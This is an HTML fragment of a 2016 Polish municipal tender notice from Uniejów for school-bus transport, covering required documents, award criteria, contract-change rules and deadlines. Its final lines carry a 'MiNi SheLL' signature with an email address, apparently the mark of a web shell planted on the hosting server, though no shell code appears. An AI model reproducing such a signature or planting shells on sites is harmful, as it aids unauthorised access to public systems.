<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki: 
A.1 Formularz ofertowy - wypełniony i podpisany przez wykonawcę (zgodnie z załącznikiem
nr 1 do SIWZ). 
A.2 Potwierdzenie wniesienia wadium. 
A.3 Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa
zamówień publicznych (zgodnie z załącznikiem nr 2 do SIWZ). 
A.4 Zgodnie z art. 26 ust. 2d ustawy Prawo zamówień publicznych Wykonawca wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że nie należy do grupy kapitałowej (zgodnie z załącznikiem nr 3 do SIWZ). 
B.3 Dokumenty potwierdzające posiadanie uprawnień/ pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas podstawienia pojazdu zastępczego w przypadku awarii - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust. 1 ustawy  z dnia 29 stycznia 2004 r. - Prawo zamówień dokonanie zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1) zmiany Podwykonawcy jeśli Wykonawca w procedurze udzielenia zamówienia  publicznego w wyniku, którego zawarto niniejszą umowę posłużył się osobą lub osobami zdolnymi do wykonania zamówienia podwykonawcy, nowy podwykonawca musi również wykazać, że posiada stosowne  kwalifikacje zawodowe z obowiązującymi przepisami  prawa, wymagane przez Zamawiającego  w procedurze o udzielenie zamówienia publicznego będącego przedmiotem umowy oraz zgoda Zamawiającego wyrażona na piśmie.
2) zmiany pojazdów skierowanych do realizacji zamówienia, z zastrzeżeniem, że nowy pojazd musi spełniać warunek określony przez Zamawiającego w procedurze o udzielenie zamówienia publicznego będącego przedmiotem umowy, 
3) adresów zamieszkania dzieci, a także zmian w wykazie dni nauki szkolnej. 
2. Dopuszcza się zmianę wysokości wynagrodzenia Wykonawcy, w razie zmiany stawki podatku od towarów i usług.
3. Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 
4. Warunkiem dokonania zmian jest złożenie pisemnego wniosku przez stronę inicjującą zmianę zawierającego : 
1) opis propozycji zmiany, 
2) uzasadnienie zmiany, 
3) opis wpływu zmiany na sposób dowożenia uczniów
5. Zmiany umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności. 
6. Zmiana osobowa listy dowożonych dzieci oraz zmiana harmonogramu w przypadkach, o których mowa w § 2 ust. 2 i 3 umowy następuje w formie pisemnego powiadomienia bez potrzeby sporządzania aneksu do umowy. 
7.Zmiana pojazdów wykorzystywanych do świadczenia usług oraz zmiana wykazu osób zatrudnionych przez Wykonawcę do realizacji zadania następuje w formie pisemnego powiadomienia bez potrzeby sporządzania aneksu do umowy - po spełnieniu warunków określonych w procedurze o udzielenie zamówienia publicznego i po wyrażeniu zgody przez Zamawiającego. 
8. Wykonawca jest zobowiązany w terminie 7 dni do pisemnego zawiadomienia Zamawiającego o zmianie danych zawartych w umowie: zmianie siedziby lub nazwy firmy Wykonawcy, zmianie osób reprezentujących Wykonawcę, ogłoszeniu upadłości Wykonawcy, likwidacji firmy Wykonawcy. 
9. W przypadku nie powiadomienia przez Wykonawcę Zamawiającego o zmianie danych  zawartych w umowie, wszelką korespondencję wysyłaną przez Zamawiającego zgodnie  z posiadanymi przez niego danymi Strony uznaje się za doręczoną. 
10. Wszystkie powyższe postanowienia niniejszego § 9 stanowią katalog zmian, na które  Zamawiający może wyrazić zgodę; nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
11. Zmiany mogą być dokonane tylko, jeśli jest to niezbędne dla prawidłowego wykonania przedmiotu umowy.
12. Istotne postanowienia umowy zawarte zostały w projekcie umowy stanowiącego  załącznik  do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uniejow.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Uniejowie, ul. Błogosławionego Bogumiła 13, 99 - 210 Uniejów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2016 godzina 10:15, miejsce: Sekretariat Urzędu Miasta w Uniejowie, ul. Błogosławionego Bogumiła 13, 99 - 210 Uniejów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 7. Przed zawarciem umowy wybrany Wykonawca zobowiązany będzie do: 
a) wniesienia wymaganego zabezpieczenia należytego wykonania umowy;  
b) w przypadku wykonawców wspólnie ubiegających się o uzyskanie zamówienia w trybie  art. 23 ust. 4 ustawy prawo zamówień publicznych przedłożenia Zamawiającemu umowy  regulującej współpracę tych wykonawców;
c)kopie  dokumentów dopuszczających dany pojazd do ruchu (dowodu rejestracyjnego potwierdzającego stan techniczny pojazdu), a w przypadku gdy Wykonawca nie jest właścicielem danego pojazdu - również dokument potwierdzający do dysponowania tym pojazdem oraz dokumentów potwierdzających posiadanie ubezpieczenia OC i NW oraz zgłoszenia danego pojazdu do licencji, zgodnie z ustawą o transporcie drogowym. 
d) kopie dokumentów poświadczających dysponowanie wymaganymi uprawnieniami zgodnie z pkt. V ust. 1 pkt 3 lit. a (prawo jazdy kategorii D , przeszkolenie w zakresie przepisów bhp i p.poż);
e) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności w zakresie prowadzonej działalności gospodarczej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com